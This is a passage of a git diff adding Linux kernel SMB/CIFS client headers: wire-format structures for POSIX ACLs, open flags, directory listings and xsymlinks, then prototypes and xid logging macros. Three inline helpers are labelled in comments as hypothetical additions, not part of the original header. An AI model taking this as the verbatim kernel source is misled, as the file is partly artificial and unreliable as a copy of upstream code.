++		u64 size;
++		u64 allocation_size
++		stream info */
++};      /* level 0x109 */
++
++struct file_compression_info {
++	__le64 compressed_size;
++	__le16 format;
++	__u8   unit_shift;
++	__u8   ch_shift;
++	__u8   cl_shift;
++	__u8   pad[3];
++} __attribute__((packed));      /* level 0x10b */
++
++/* POSIX ACL set/query path info structures */
++#define CIFS_ACL_VERSION 1
++struct cifs_posix_ace { /* access control entry (ACE) */
++	__u8  cifs_e_tag;
++	__u8  cifs_e_perm;
++	__le64 cifs_uid; /* or gid */
++} __attribute__((packed));
++
++struct cifs_posix_acl { /* access control list (ACL) */
++	__le16	version;
++	__le16	access_entry_count;  /* access ACL - count of entries */
++	__le16	default_entry_count; /* default ACL - count of entries */
++	struct cifs_posix_ace ace_array[];
++	/* followed by
++	struct cifs_posix_ace default_ace_array[] */
++} __attribute__((packed));  /* level 0x204 */
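++
++/*
++ * Illustrative helper (not part of the original header, name hypothetical):
++ * the level 0x204 blob is the fixed header above followed by the access
++ * ACEs and then the default ACEs, so its total on-the-wire size follows
++ * directly from the two counts:
++ */
++static inline size_t cifs_posix_acl_size_sketch(const struct cifs_posix_acl *acl)
++{
++	return sizeof(struct cifs_posix_acl) +
++	       (le16_to_cpu(acl->access_entry_count) +
++		le16_to_cpu(acl->default_entry_count)) *
++	       sizeof(struct cifs_posix_ace);
++}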
++
++/* types of access control entries already defined in posix_acl.h */
++/* #define CIFS_POSIX_ACL_USER_OBJ	 0x01
++#define CIFS_POSIX_ACL_USER      0x02
++#define CIFS_POSIX_ACL_GROUP_OBJ 0x04
++#define CIFS_POSIX_ACL_GROUP     0x08
++#define CIFS_POSIX_ACL_MASK      0x10
++#define CIFS_POSIX_ACL_OTHER     0x20 */
++
++/* types of perms */
++/* #define CIFS_POSIX_ACL_EXECUTE   0x01
++#define CIFS_POSIX_ACL_WRITE     0x02
++#define CIFS_POSIX_ACL_READ	     0x04 */
++
++/* end of POSIX ACL definitions */
++
++/* POSIX Open Flags */
++#define SMB_O_RDONLY	0x1
++#define SMB_O_WRONLY	0x2
++#define SMB_O_RDWR	0x4
++#define SMB_O_CREAT	0x10
++#define SMB_O_EXCL	0x20
++#define SMB_O_TRUNC	0x40
++#define SMB_O_APPEND	0x80
++#define SMB_O_SYNC	0x100
++#define SMB_O_DIRECTORY	0x200
++#define SMB_O_NOFOLLOW	0x400
++#define SMB_O_DIRECT	0x800
++
++typedef struct {
++	__le32 OpenFlags; /* same as NT CreateX */
++	__le32 PosixOpenFlags;
++	__le64 Permissions;
++	__le16 Level; /* reply level requested (see QPathInfo levels) */
++} __attribute__((packed)) OPEN_PSX_REQ; /* level 0x209 SetPathInfo data */
++
++typedef struct {
++	__le16 OplockFlags;
++	__u16 Fid;
++	__le32 CreateAction;
++	__le16 ReturnedLevel;
++	__le16 Pad;
++	/* struct following varies based on requested level */
++} __attribute__((packed)) OPEN_PSX_RSP; /* level 0x209 SetPathInfo data */
++
++#define SMB_POSIX_UNLINK_FILE_TARGET		0
++#define SMB_POSIX_UNLINK_DIRECTORY_TARGET	1
++
++struct unlink_psx_rq { /* level 0x20a SetPathInfo */
++	__le16 type;
++} __attribute__((packed));
++
++struct file_internal_info {
++	__le64  UniqueId; /* inode number */
++} __attribute__((packed));      /* level 0x3ee */
++
++struct file_mode_info {
++	__le32	Mode;
++} __attribute__((packed));      /* level 0x3f8 */
++
++struct file_attrib_tag {
++	__le32 Attribute;
++	__le32 ReparseTag;
++} __attribute__((packed));      /* level 0x40b */
++
++
++/********************************************************/
++/*  FindFirst/FindNext transact2 data buffer formats    */
++/********************************************************/
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 ResumeKey; /* as with FileIndex - no need to convert */
++	FILE_UNIX_BASIC_INFO basic;
++	char FileName[1];
++} __attribute__((packed)) FILE_UNIX_INFO; /* level 0x202 */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	char FileName[1];
++} __attribute__((packed)) FILE_DIRECTORY_INFO;   /* level 0x101 FF resp data */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	char FileName[1];
++} __attribute__((packed)) FILE_FULL_DIRECTORY_INFO; /* level 0x102 rsp data */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* EA size */
++	__le32 Reserved;
++	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
++	char FileName[1];
++} __attribute__((packed)) SEARCH_ID_FULL_DIR_INFO; /* level 0x105 FF rsp data */
++
++typedef struct {
++	__le32 NextEntryOffset;
++	__u32 FileIndex;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 ExtFileAttributes;
++	__le32 FileNameLength;
++	__le32 EaSize; /* length of the xattrs */
++	__u8   ShortNameLength;
++	__u8   Reserved;
++	__u8   ShortName[24];
++	char FileName[1];
++} __attribute__((packed)) FILE_BOTH_DIRECTORY_INFO; /* level 0x104 FFrsp data */
++
++typedef struct {
++	__u32  ResumeKey;
++	__le16 CreationDate; /* SMB Date */
++	__le16 CreationTime; /* SMB Time */
++	__le16 LastAccessDate;
++	__le16 LastAccessTime;
++	__le16 LastWriteDate;
++	__le16 LastWriteTime;
++	__le32 DataSize; /* File Size (EOF) */
++	__le32 AllocationSize;
++	__le16 Attributes; /* verify not u32 */
++	__u8   FileNameLength;
++	char FileName[1];
++} __attribute__((packed)) FIND_FILE_STANDARD_INFO; /* level 0x1 FF resp data */
++
++
++struct win_dev {
++	unsigned char type[8]; /* IntxCHR or IntxBLK */
++	__le64 major;
++	__le64 minor;
++} __attribute__((packed));
++
++struct gea {
++	unsigned char name_len;
++	char name[1];
++} __attribute__((packed));
++
++struct gealist {
++	unsigned long list_len;
++	struct gea list[1];
++} __attribute__((packed));
++
++struct fea {
++	unsigned char EA_flags;
++	__u8 name_len;
++	__le16 value_len;
++	char name[1];
++	/* optionally followed by value */
++} __attribute__((packed));
++/* flags for _FEA.fEA */
++#define FEA_NEEDEA         0x80	/* need EA bit */
++
++struct fealist {
++	__le32 list_len;
++	struct fea list[1];
++} __attribute__((packed));
++
++/* used to hold an arbitrary blob of data */
++struct data_blob {
++	__u8 *data;
++	size_t length;
++	void (*free) (struct data_blob *data_blob);
++} __attribute__((packed));
++
++
++#ifdef CONFIG_CIFS_POSIX
++/*
++	For better POSIX semantics from the Linux client (even better
++	than the existing CIFS Unix Extensions) we need updated PDUs for:
++
++	1) PosixCreateX - to set and return the mode, inode#, device info and
++	perhaps add a CreateDevice - to create Pipes and other special inodes.
++	Also note POSIX open flags
++	2) Close - to return the last write time so that caching across
++		close can be done more safely
++	3) FindFirst return unique inode number - what about resume key, two
++	forms short (matches readdir) and full (enough info to cache inodes)
++	4) Mkdir - set mode
++
++	And under consideration:
++	5) FindClose2 (return nanosecond timestamp ??)
++	6) Use nanosecond timestamps throughout all time fields if
++	   corresponding attribute flag is set
++	7) sendfile - handle based copy
++
++	what about fixing 64 bit alignment
++
++	There are also various legacy SMB/CIFS requests that are used as-is
++
++	From existing Lanman and NTLM dialects:
++	--------------------------------------
++	NEGOTIATE
++	SESSION_SETUP_ANDX (BB which?)
++	TREE_CONNECT_ANDX (BB which wct?)
++	TREE_DISCONNECT (BB add volume timestamp on response)
++	LOGOFF_ANDX
++	DELETE (note delete open file behavior)
++	DELETE_DIRECTORY
++	READ_AND_X
++	WRITE_AND_X
++	LOCKING_AND_X (note posix lock semantics)
++	RENAME (note rename across dirs and open file rename posix behaviors)
++	NT_RENAME (for hardlinks) Is this good enough for all features?
++	FIND_CLOSE2
++	TRANSACTION2 (18 cases)
++		SMB_SET_FILE_END_OF_FILE_INFO2 SMB_SET_PATH_END_OF_FILE_INFO2
++		(BB verify that never need to set allocation size)
++		SMB_SET_FILE_BASIC_INFO2 (setting times - BB can it be done via
++			 Unix ext?)
++
++	COPY (note support for copy across directories) - FUTURE, OPTIONAL
++	setting/getting OS/2 EAs - FUTURE (BB can this handle
++	setting Linux xattrs perfectly)         - OPTIONAL
++	dnotify                                 - FUTURE, OPTIONAL
++	quota                                   - FUTURE, OPTIONAL
++
++	Note that various requests implemented for NT interop such as
++		NT_TRANSACT (IOCTL) QueryReparseInfo
++	are unneeded when talking to servers compliant with the CIFS POSIX
++	extensions
++
++	From CIFS Unix Extensions:
++	-------------------------
++	T2 SET_PATH_INFO (SMB_SET_FILE_UNIX_LINK) for symlinks
++	T2 SET_PATH_INFO (SMB_SET_FILE_BASIC_INFO2)
++	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_LINK)
++	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_BASIC)	BB check for missing
++							inode fields
++				Actually we need QUERY_FILE_UNIX_INFO
++				since it has the inode number
++				BB what about a) blksize/blkbits/blocks
++							  b) i_version
++							  c) i_rdev
++							  d) notify mask?
++							  e) generation
++							  f) size_seqcount
++	T2 FIND_FIRST/FIND_NEXT FIND_FILE_UNIX
++	TRANS2_GET_DFS_REFERRAL		      - OPTIONAL but recommended
++	T2_QFS_INFO QueryDevice/AttributeInfo - OPTIONAL
++ */
++
++/* xsymlink is a symlink format (used by MacOS) that can be used
++   to save symlink info in a regular file when the share is mounted
++   on operating systems that do not support the cifs Unix extensions
++   or EAs (for xattr based symlinks).  For such a file to be
++   recognized as containing symlink data:
++
++   1) the file size must be 1067,
++   2) the signature must begin the file data,
++   3) the length field must be set to the ASCII representation
++	of a number which is less than or equal to 1024,
++   4) the md5 must match that of the path data */
++
++struct xsymlink {
++	/* 1067 bytes */
++	char signature[4]; /* XSym */ /* not null terminated */
++	char cr0;         /* \n */
++/* ASCII representation of length (4 bytes decimal) terminated by \n not null */
++	char length[4];
++	char cr1;         /* \n */
++/* md5 of valid subset of path ie path[0] through path[length-1] */
++	__u8 md5[32];
++	char cr2;        /* \n */
++/* if room left, then end with \n then 0x20s by convention but not required */
++	char path[1024];
++} __attribute__((packed));
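++
++/*
++ * Illustrative sketch (not part of the original header, name hypothetical):
++ * the cheap structural checks from the comment above applied to a
++ * candidate buffer; the md5 comparison (rule 4) is omitted.
++ */
++static inline bool is_xsymlink_candidate_sketch(const struct xsymlink *xs,
++						size_t file_size)
++{
++	unsigned int len = 0;
++	int i;
++
++	if (file_size != 1067)			/* rule 1 */
++		return false;
++	if (memcmp(xs->signature, "XSym", 4))	/* rule 2 */
++		return false;
++	for (i = 0; i < 4; i++) {		/* rule 3 */
++		if (!isdigit(xs->length[i]))
++			return false;
++		len = len * 10 + (xs->length[i] - '0');
++	}
++	return len <= 1024;
++}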
++
++typedef struct file_xattr_info {
++	/* BB do we need another field for flags? BB */
++	__u32 xattr_name_len;
++	__u32 xattr_value_len;
++	char  xattr_name[];
++	/* followed by xattr_value[xattr_value_len], no pad */
++} __attribute__((packed)) FILE_XATTR_INFO; /* extended attribute info
++					      level 0x205 */
++
++/* flags for the lsattr and chflags commands were removed; they are in uapi/linux/fs.h */
++
++typedef struct file_chattr_info {
++	__le64	mask; /* list of all possible attribute bits */
++	__le64	mode; /* list of actual attribute bits on this inode */
++} __attribute__((packed)) FILE_CHATTR_INFO;  /* ext attributes
++						(chattr, chflags) level 0x206 */
++#endif 				/* POSIX */
++#endif				/* _CIFSPDU_H */
+diff --git a/fs/smb/client/cifsproto.h b/fs/smb/client/cifsproto.h
+new file mode 100644
+index 0000000000000..98513f5af3f96
+--- /dev/null
++++ b/fs/smb/client/cifsproto.h
+@@ -0,0 +1,696 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#ifndef _CIFSPROTO_H
++#define _CIFSPROTO_H
++#include <linux/nls.h>
++#include "trace.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++
++struct statfs;
++struct smb_rqst;
++struct smb3_fs_context;
++
++/*
++ *****************************************************************
++ * All Prototypes
++ *****************************************************************
++ */
++
++extern struct smb_hdr *cifs_buf_get(void);
++extern void cifs_buf_release(void *);
++extern struct smb_hdr *cifs_small_buf_get(void);
++extern void cifs_small_buf_release(void *);
++extern void free_rsp_buf(int, void *);
++extern int smb_send(struct TCP_Server_Info *, struct smb_hdr *,
++			unsigned int /* length */);
++extern unsigned int _get_xid(void);
++extern void _free_xid(unsigned int);
++#define get_xid()							\
++({									\
++	unsigned int __xid = _get_xid();				\
++	cifs_dbg(FYI, "VFS: in %s as Xid: %u with uid: %d\n",		\
++		 __func__, __xid,					\
++		 from_kuid(&init_user_ns, current_fsuid()));		\
++	trace_smb3_enter(__xid, __func__);				\
++	__xid;								\
++})
++
++#define free_xid(curr_xid)						\
++do {									\
++	_free_xid(curr_xid);						\
++	cifs_dbg(FYI, "VFS: leaving %s (xid = %u) rc = %d\n",		\
++		 __func__, curr_xid, (int)rc);				\
++	if (rc)								\
++		trace_smb3_exit_err(curr_xid, __func__, (int)rc);	\
++	else								\
++		trace_smb3_exit_done(curr_xid, __func__);		\
++} while (0)
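++
++/*
++ * Illustrative usage (not part of the original header, function name
++ * hypothetical): free_xid() expands to code that reads a variable named
++ * rc from the calling scope, so callers are expected to follow this
++ * pattern:
++ */
++static inline int example_xid_user_sketch(void)
++{
++	unsigned int xid = get_xid();	/* logs entry and starts the trace */
++	int rc = 0;
++
++	/* ... do the actual SMB work, setting rc on failure ... */
++
++	free_xid(xid);	/* logs exit; traces done or err based on rc */
++	return rc;
++}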
++extern int init_cifs_idmap(void);
++extern void exit_cifs_idmap(void);
++extern int init_cifs_spnego(void);
++extern void exit_cifs_spnego(void);
++extern const char *build_path_from_dentry(struct dentry *, void *);
++extern char *build_path_from_dentry_optional_prefix(struct dentry *direntry,
++						    void *page, bool prefix);
++static inline void *alloc_dentry_path(void)
++{
++	return __getname();
++}
++
++static inline void free_dentry_path(void *page)
++{
++	if (page)
++		__putname(page);
++}
++
++extern char *cifs_build_path_to_root(struct smb3_fs_context *ctx,
++				     struct cifs_sb_info *cifs_sb,
++				     struct cifs_tcon *tcon,
++				     int add_treename);
++extern char *build_wildcard_path_from_dentry(struct dentry *direntry);
++extern char *cifs_compose_mount_options(const char *sb_mountdata,
++		const char *fullpath, const struct dfs_info3_param *ref,
++		char **devname);
++extern void delete_mid(struct mid_q_entry *mid);
++extern void release_mid(struct mid_q_entry *mid);
++extern void cifs_wake_up_task(struct mid_q_entry *mid);
++extern int cifs_handle_standard(struct TCP_Server_Info *server,
++				struct mid_q_entry *mid);
++extern int smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx);
++extern int smb3_parse_opt(const char *options, const char *key, char **val);
++extern bool cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs);
++extern int cifs_discard_remaining_data(struct TCP_Server_Info *server);
++extern int cifs_call_async(struct TCP_Server_Info *server,
++			struct smb_rqst *rqst,
++			mid_receive_t *receive, mid_callback_t *callback,
++			mid_handle_t *handle, void *cbdata, const int flags,
++			const struct cifs_credits *exist_credits);
++extern struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses);
++extern int cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
++			  struct TCP_Server_Info *server,
++			  struct smb_rqst *rqst, int *resp_buf_type,
++			  const int flags, struct kvec *resp_iov);
++extern int compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
++			      struct TCP_Server_Info *server,
++			      const int flags, const int num_rqst,
++			      struct smb_rqst *rqst, int *resp_buf_type,
++			      struct kvec *resp_iov);
++extern int SendReceive(const unsigned int /* xid */, struct cifs_ses *,
++			struct smb_hdr * /* input */,
++			struct smb_hdr * /* out */,
++			int * /* bytes returned */, const int);
++extern int SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
++			    char *in_buf, int flags);
++extern struct mid_q_entry *cifs_setup_request(struct cifs_ses *,
++				struct TCP_Server_Info *,
++				struct smb_rqst *);
++extern struct mid_q_entry *cifs_setup_async_request(struct TCP_Server_Info *,
++						struct smb_rqst *);
++extern int cifs_check_receive(struct mid_q_entry *mid,
++			struct TCP_Server_Info *server, bool log_error);
++extern int cifs_wait_mtu_credits(struct TCP_Server_Info *server,
++				 unsigned int size, unsigned int *num,
++				 struct cifs_credits *credits);
++extern int SendReceive2(const unsigned int /* xid */, struct cifs_ses *,
++			struct kvec *, int /* nvec to send */,
++			int * /* type of buf returned */, const int flags,
++			struct kvec * /* resp vec */);
++extern int SendReceiveBlockingLock(const unsigned int xid,
++			struct cifs_tcon *ptcon,
++			struct smb_hdr *in_buf,
++			struct smb_hdr *out_buf,
++			int *bytes_returned);
++void
++cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
++				      bool all_channels);
++void
++cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
++				      bool mark_smb_session);
++extern int cifs_reconnect(struct TCP_Server_Info *server,
++			  bool mark_smb_session);
++extern int checkSMB(char *buf, unsigned int len, struct TCP_Server_Info *srvr);
++extern bool is_valid_oplock_break(char *, struct TCP_Server_Info *);
++extern bool backup_cred(struct cifs_sb_info *);
++extern bool is_size_safe_to_change(struct cifsInodeInfo *, __u64 eof);
++extern void cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
++			    unsigned int bytes_written);
++extern struct cifsFileInfo *find_writable_file(struct cifsInodeInfo *, int);
++extern int cifs_get_writable_file(struct cifsInodeInfo *cifs_inode,
++				  int flags,
++				  struct cifsFileInfo **ret_file);
++extern int cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
++				  int flags,
++				  struct cifsFileInfo **ret_file);
++extern struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *, bool);
++extern int cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
++				  struct cifsFileInfo **ret_file);
++extern unsigned int smbCalcSize(void *buf);
++extern int decode_negTokenInit(unsigned char *security_blob, int length,
++			struct TCP_Server_Info *server);
++extern int cifs_convert_address(struct sockaddr *dst, const char *src, int len);
++extern void cifs_set_port(struct sockaddr *addr, const unsigned short int port);
++extern int map_smb_to_linux_error(char *buf, bool logErr);
++extern int map_and_check_smb_error(struct mid_q_entry *mid, bool logErr);
++extern void header_assemble(struct smb_hdr *, char /* command */,
++			    const struct cifs_tcon *, int /* length of
++			    fixed section (word count) in two byte units */);
++extern int small_smb_init_no_tc(const int smb_cmd, const int wct,
++				struct cifs_ses *ses,
++				void **request_buf);
++extern enum securityEnum select_sectype(struct TCP_Server_Info *server,
++				enum securityEnum requested);
++extern int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
++			  struct TCP_Server_Info *server,
++			  const struct nls_table *nls_cp);
++extern struct timespec64 cifs_NTtimeToUnix(__le64 utc_nanoseconds_since_1601);
++extern u64 cifs_UnixTimeToNT(struct timespec64);
++extern struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time,
++				      int offset);
++extern void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock);
++extern int cifs_get_writer(struct cifsInodeInfo *cinode);
++extern void cifs_put_writer(struct cifsInodeInfo *cinode);
++extern void cifs_done_oplock_break(struct cifsInodeInfo *cinode);
++extern int cifs_unlock_range(struct cifsFileInfo *cfile,
++			     struct file_lock *flock, const unsigned int xid);
++extern int cifs_push_mandatory_locks(struct cifsFileInfo *cfile);
++
++extern void cifs_down_write(struct rw_semaphore *sem);
++struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
++				       struct tcon_link *tlink, __u32 oplock,
++				       const char *symlink_target);
++extern int cifs_posix_open(const char *full_path, struct inode **inode,
++			   struct super_block *sb, int mode,
++			   unsigned int f_flags, __u32 *oplock, __u16 *netfid,
++			   unsigned int xid);
++void cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr);
++extern void cifs_unix_basic_to_fattr(struct cifs_fattr *fattr,
++				     FILE_UNIX_BASIC_INFO *info,
++				     struct cifs_sb_info *cifs_sb);
++extern void cifs_dir_info_to_fattr(struct cifs_fattr *, FILE_DIRECTORY_INFO *,
++					struct cifs_sb_info *);
++extern int cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr);
++extern struct inode *cifs_iget(struct super_block *sb,
++			       struct cifs_fattr *fattr);
++
++int cifs_get_inode_info(struct inode **inode, const char *full_path,
++			struct cifs_open_info_data *data, struct super_block *sb, int xid,
++			const struct cifs_fid *fid);
++extern int smb311_posix_get_inode_info(struct inode **pinode, const char *search_path,
++			struct super_block *sb, unsigned int xid);
++extern int cifs_get_inode_info_unix(struct inode **pinode,
++			const unsigned char *search_path,
++			struct super_block *sb, unsigned int xid);
++extern int cifs_set_file_info(struct inode *inode, struct iattr *attrs,
++			      unsigned int xid, const char *full_path, __u32 dosattr);
++extern int cifs_rename_pending_delete(const char *full_path,
++				      struct dentry *dentry,
++				      const unsigned int xid);
++extern int sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
++				struct cifs_fattr *fattr, uint sidtype);
++extern int cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb,
++			      struct cifs_fattr *fattr, struct inode *inode,
++			      bool get_mode_from_special_sid,
++			      const char *path, const struct cifs_fid *pfid);
++extern int id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
++					kuid_t uid, kgid_t gid);
++extern struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *, struct inode *,
++				      const char *, u32 *, u32);
++extern struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *,
++				const struct cifs_fid *, u32 *, u32);
++extern int set_cifs_acl(struct cifs_ntsd *, __u32, struct inode *,
++				const char *, int);
++extern unsigned int setup_authusers_ACE(struct cifs_ace *pace);
++extern unsigned int setup_special_mode_ACE(struct cifs_ace *pace, __u64 nmode);
++extern unsigned int setup_special_user_owner_ACE(struct cifs_ace *pace);
++
++extern void dequeue_mid(struct mid_q_entry *mid, bool malformed);
++extern int cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
++			         unsigned int to_read);
++extern ssize_t cifs_discard_from_socket(struct TCP_Server_Info *server,
++					size_t to_read);
++extern int cifs_read_page_from_socket(struct TCP_Server_Info *server,
++					struct page *page,
++					unsigned int page_offset,
++					unsigned int to_read);
++extern int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb);
++extern int cifs_match_super(struct super_block *, void *);
++extern int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx);
++extern void cifs_umount(struct cifs_sb_info *);
++extern void cifs_mark_open_files_invalid(struct cifs_tcon *tcon);
++extern void cifs_reopen_persistent_handles(struct cifs_tcon *tcon);
++
++extern bool cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset,
++				    __u64 length, __u8 type, __u16 flags,
++				    struct cifsLockInfo **conf_lock,
++				    int rw_check);
++extern void cifs_add_pending_open(struct cifs_fid *fid,
++				  struct tcon_link *tlink,
++				  struct cifs_pending_open *open);
++extern void cifs_add_pending_open_locked(struct cifs_fid *fid,
++					 struct tcon_link *tlink,
++					 struct cifs_pending_open *open);
++extern void cifs_del_pending_open(struct cifs_pending_open *open);
++
++extern bool cifs_is_deferred_close(struct cifsFileInfo *cfile,
++				struct cifs_deferred_close **dclose);
++
++extern void cifs_add_deferred_close(struct cifsFileInfo *cfile,
++				struct cifs_deferred_close *dclose);
++
++extern void cifs_del_deferred_close(struct cifsFileInfo *cfile);
++
++extern void cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode);
++
++extern void cifs_close_all_deferred_files(struct cifs_tcon *cifs_tcon);
++
++extern void cifs_close_deferred_file_under_dentry(struct cifs_tcon *cifs_tcon,
++				const char *path);
++extern struct TCP_Server_Info *
++cifs_get_tcp_session(struct smb3_fs_context *ctx,
++		     struct TCP_Server_Info *primary_server);
++extern void cifs_put_tcp_session(struct TCP_Server_Info *server,
++				 int from_reconnect);
++extern void cifs_put_tcon(struct cifs_tcon *tcon);
++
++#if IS_ENABLED(CONFIG_CIFS_DFS_UPCALL)
++extern void cifs_dfs_release_automount_timer(void);
++#else /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
++#define cifs_dfs_release_automount_timer()	do { } while (0)
++#endif /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
++
++void cifs_proc_init(void);
++void cifs_proc_clean(void);
++
++extern void cifs_move_llist(struct list_head *source, struct list_head *dest);
++extern void cifs_free_llist(struct list_head *llist);
++extern void cifs_del_lock_waiters(struct cifsLockInfo *lock);
++
++extern int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon,
++			     const struct nls_table *nlsc);
++
++extern int cifs_negotiate_protocol(const unsigned int xid,
++				   struct cifs_ses *ses,
++				   struct TCP_Server_Info *server);
++extern int cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
++			      struct TCP_Server_Info *server,
++			      struct nls_table *nls_info);
++extern int cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required);
++extern int CIFSSMBNegotiate(const unsigned int xid,
++			    struct cifs_ses *ses,
++			    struct TCP_Server_Info *server);
++
++extern int CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
++		    const char *tree, struct cifs_tcon *tcon,
++		    const struct nls_table *);
++
++extern int CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
++		const char *searchName, struct cifs_sb_info *cifs_sb,
++		__u16 *searchHandle, __u16 search_flags,
++		struct cifs_search_info *psrch_inf,
++		bool msearch);
++
++extern int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
++		__u16 searchHandle, __u16 search_flags,
++		struct cifs_search_info *psrch_inf);
++
++extern int CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
++			const __u16 search_handle);
++
++extern int CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			u16 netfid, FILE_ALL_INFO *pFindData);
++extern int CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			    const char *search_Name, FILE_ALL_INFO *data,
++			    int legacy /* whether to use old info level */,
++			    const struct nls_table *nls_codepage, int remap);
++extern int SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
++			       const char *search_name, FILE_ALL_INFO *data,
++			       const struct nls_table *nls_codepage, int remap);
++
++extern int CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			u16 netfid, FILE_UNIX_BASIC_INFO *pFindData);
++extern int CIFSSMBUnixQPathInfo(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const unsigned char *searchName,
++			FILE_UNIX_BASIC_INFO *pFindData,
++			const struct nls_table *nls_codepage, int remap);
++
++extern int CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
++			   const char *search_name,
++			   struct dfs_info3_param **target_nodes,
++			   unsigned int *num_of_nodes,
++			   const struct nls_table *nls_codepage, int remap);
++
++extern int parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
++			       unsigned int *num_of_nodes,
++			       struct dfs_info3_param **target_nodes,
++			       const struct nls_table *nls_codepage, int remap,
++			       const char *searchName, bool is_unicode);
++extern void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
++				 struct cifs_sb_info *cifs_sb,
++				 struct smb3_fs_context *ctx);
++extern int CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			struct kstatfs *FSData);
++extern int SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			struct kstatfs *FSData);
++extern int CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			__u64 cap);
++
++extern int CIFSSMBQFSAttributeInfo(const unsigned int xid,
++			struct cifs_tcon *tcon);
++extern int CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon);
++extern int CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon);
++extern int CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			struct kstatfs *FSData);
++
++extern int CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *fileName, const FILE_BASIC_INFO *data,
++			const struct nls_table *nls_codepage,
++			struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			const FILE_BASIC_INFO *data, __u16 fid,
++			__u32 pid_of_opener);
++extern int CIFSSMBSetFileDisposition(const unsigned int xid,
++				     struct cifs_tcon *tcon,
++				     bool delete_file, __u16 fid,
++				     __u32 pid_of_opener);
++extern int CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
++			 const char *file_name, __u64 size,
++			 struct cifs_sb_info *cifs_sb, bool set_allocation);
++extern int CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
++			      struct cifsFileInfo *cfile, __u64 size,
++			      bool set_allocation);
++
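++/*
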